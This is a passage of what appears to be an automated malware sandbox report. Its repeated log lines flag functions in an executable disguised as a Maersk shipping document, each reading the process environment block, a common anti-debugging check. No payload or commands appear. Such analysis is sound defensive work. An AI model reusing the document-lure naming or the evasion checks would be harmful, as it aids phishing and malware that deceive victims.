                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE5CF mov eax, dword ptr fs:[00000030h]3_2_017DE5CF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C45B1 mov eax, dword ptr fs:[00000030h]3_2_017C45B1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C45B1 mov eax, dword ptr fs:[00000030h]3_2_017C45B1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE59C mov eax, dword ptr fs:[00000030h]3_2_017DE59C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D4588 mov eax, dword ptr fs:[00000030h]3_2_017D4588
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2582 mov eax, dword ptr fs:[00000030h]3_2_017A2582
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A2582 mov ecx, dword ptr fs:[00000030h]3_2_017A2582
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CA470 mov eax, dword ptr fs:[00000030h]3_2_017CA470
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185A49A mov eax, dword ptr fs:[00000030h]3_2_0185A49A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179645D mov eax, dword ptr fs:[00000030h]3_2_0179645D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C245A mov eax, dword ptr fs:[00000030h]3_2_017C245A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182A4B0 mov eax, dword ptr fs:[00000030h]3_2_0182A4B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DE443 mov eax, dword ptr fs:[00000030h]3_2_017DE443
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA430 mov eax, dword ptr fs:[00000030h]3_2_017DA430
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179E420 mov eax, dword ptr fs:[00000030h]3_2_0179E420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179C427 mov eax, dword ptr fs:[00000030h]3_2_0179C427
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8402 mov eax, dword ptr fs:[00000030h]3_2_017D8402
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A04E5 mov ecx, dword ptr fs:[00000030h]3_2_017A04E5
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D44B0 mov ecx, dword ptr fs:[00000030h]3_2_017D44B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A64AB mov eax, dword ptr fs:[00000030h]3_2_017A64AB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185A456 mov eax, dword ptr fs:[00000030h]3_2_0185A456
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C460 mov ecx, dword ptr fs:[00000030h]3_2_0182C460
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8770 mov eax, dword ptr fs:[00000030h]3_2_017A8770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184678E mov eax, dword ptr fs:[00000030h]3_2_0184678E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018547A0 mov eax, dword ptr fs:[00000030h]3_2_018547A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0750 mov eax, dword ptr fs:[00000030h]3_2_017A0750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2750 mov eax, dword ptr fs:[00000030h]3_2_017E2750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2750 mov eax, dword ptr fs:[00000030h]3_2_017E2750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov esi, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov eax, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov eax, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov eax, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov ecx, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov eax, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018207C3 mov eax, dword ptr fs:[00000030h]3_2_018207C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC720 mov eax, dword ptr fs:[00000030h]3_2_017DC720
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC720 mov eax, dword ptr fs:[00000030h]3_2_017DC720
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E7E1 mov eax, dword ptr fs:[00000030h]3_2_0182E7E1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0710 mov eax, dword ptr fs:[00000030h]3_2_017A0710
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D0710 mov eax, dword ptr fs:[00000030h]3_2_017D0710
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC700 mov eax, dword ptr fs:[00000030h]3_2_017DC700
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A47FB mov eax, dword ptr fs:[00000030h]3_2_017A47FB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A47FB mov eax, dword ptr fs:[00000030h]3_2_017A47FB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181C730 mov eax, dword ptr fs:[00000030h]3_2_0181C730
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AC7C0 mov eax, dword ptr fs:[00000030h]3_2_017AC7C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A07AF mov eax, dword ptr fs:[00000030h]3_2_017A07AF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01824755 mov eax, dword ptr fs:[00000030h]3_2_01824755
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E75D mov eax, dword ptr fs:[00000030h]3_2_0182E75D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D2674 mov eax, dword ptr fs:[00000030h]3_2_017D2674
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA660 mov eax, dword ptr fs:[00000030h]3_2_017DA660
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA660 mov eax, dword ptr fs:[00000030h]3_2_017DA660
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BC640 mov eax, dword ptr fs:[00000030h]3_2_017BC640
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A262C mov eax, dword ptr fs:[00000030h]3_2_017A262C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BE627 mov eax, dword ptr fs:[00000030h]3_2_017BE627
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D6620 mov eax, dword ptr fs:[00000030h]3_2_017D6620
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8620 mov eax, dword ptr fs:[00000030h]3_2_017D8620
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2619 mov eax, dword ptr fs:[00000030h]3_2_017E2619
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018206F1 mov eax, dword ptr fs:[00000030h]3_2_018206F1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018206F1 mov eax, dword ptr fs:[00000030h]3_2_018206F1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E609 mov eax, dword ptr fs:[00000030h]3_2_0181E609
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017DA6C7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA6C7 mov eax, dword ptr fs:[00000030h]3_2_017DA6C7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D66B0 mov eax, dword ptr fs:[00000030h]3_2_017D66B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC6A6 mov eax, dword ptr fs:[00000030h]3_2_017DC6A6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186866E mov eax, dword ptr fs:[00000030h]3_2_0186866E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186866E mov eax, dword ptr fs:[00000030h]3_2_0186866E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4690 mov eax, dword ptr fs:[00000030h]3_2_017A4690
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4690 mov eax, dword ptr fs:[00000030h]3_2_017A4690
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov eax, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov edx, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov eax, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov esi, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov eax, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov eax, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018369C0 mov eax, dword ptr fs:[00000030h]3_2_018369C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186A9D3 mov eax, dword ptr fs:[00000030h]3_2_0186A9D3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01798918 mov eax, dword ptr fs:[00000030h]3_2_01798918
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01798918 mov eax, dword ptr fs:[00000030h]3_2_01798918
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E9E0 mov eax, dword ptr fs:[00000030h]3_2_0182E9E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D29F9 mov eax, dword ptr fs:[00000030h]3_2_017D29F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D29F9 mov eax, dword ptr fs:[00000030h]3_2_017D29F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E908 mov eax, dword ptr fs:[00000030h]3_2_0181E908
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E908 mov eax, dword ptr fs:[00000030h]3_2_0181E908
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C912 mov eax, dword ptr fs:[00000030h]3_2_0182C912
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182892A mov eax, dword ptr fs:[00000030h]3_2_0182892A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0183892B mov eax, dword ptr fs:[00000030h]3_2_0183892B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D49D0 mov eax, dword ptr fs:[00000030h]3_2_017D49D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01820946 mov eax, dword ptr fs:[00000030h]3_2_01820946
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874940 mov eax, dword ptr fs:[00000030h]3_2_01874940
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD mov eax, dword ptr fs:[00000030h]3_2_017A09AD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD mov eax, dword ptr fs:[00000030h]3_2_017A09AD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01844978 mov eax, dword ptr fs:[00000030h]3_2_01844978
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01844978 mov eax, dword ptr fs:[00000030h]3_2_01844978
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C97C mov eax, dword ptr fs:[00000030h]3_2_0182C97C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C89D mov eax, dword ptr fs:[00000030h]3_2_0182C89D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4859 mov eax, dword ptr fs:[00000030h]3_2_017A4859
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4859 mov eax, dword ptr fs:[00000030h]3_2_017A4859
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D0854 mov eax, dword ptr fs:[00000030h]3_2_017D0854
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B2840 mov ecx, dword ptr fs:[00000030h]3_2_017B2840
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018708C0 mov eax, dword ptr fs:[00000030h]3_2_018708C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov eax, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov eax, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov eax, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov ecx, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov eax, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C2835 mov eax, dword ptr fs:[00000030h]3_2_017C2835
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA830 mov eax, dword ptr fs:[00000030h]3_2_017DA830
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186A8E4 mov eax, dword ptr fs:[00000030h]3_2_0186A8E4
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC8F9 mov eax, dword ptr fs:[00000030h]3_2_017DC8F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC8F9 mov eax, dword ptr fs:[00000030h]3_2_017DC8F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C810 mov eax, dword ptr fs:[00000030h]3_2_0182C810
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CE8C0 mov eax, dword ptr fs:[00000030h]3_2_017CE8C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184483A mov eax, dword ptr fs:[00000030h]3_2_0184483A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184483A mov eax, dword ptr fs:[00000030h]3_2_0184483A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E872 mov eax, dword ptr fs:[00000030h]3_2_0182E872
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E872 mov eax, dword ptr fs:[00000030h]3_2_0182E872
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01836870 mov eax, dword ptr fs:[00000030h]3_2_01836870
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01836870 mov eax, dword ptr fs:[00000030h]3_2_01836870
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0887 mov eax, dword ptr fs:[00000030h]3_2_017A0887
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0179CB7E mov eax, dword ptr fs:[00000030h]3_2_0179CB7E
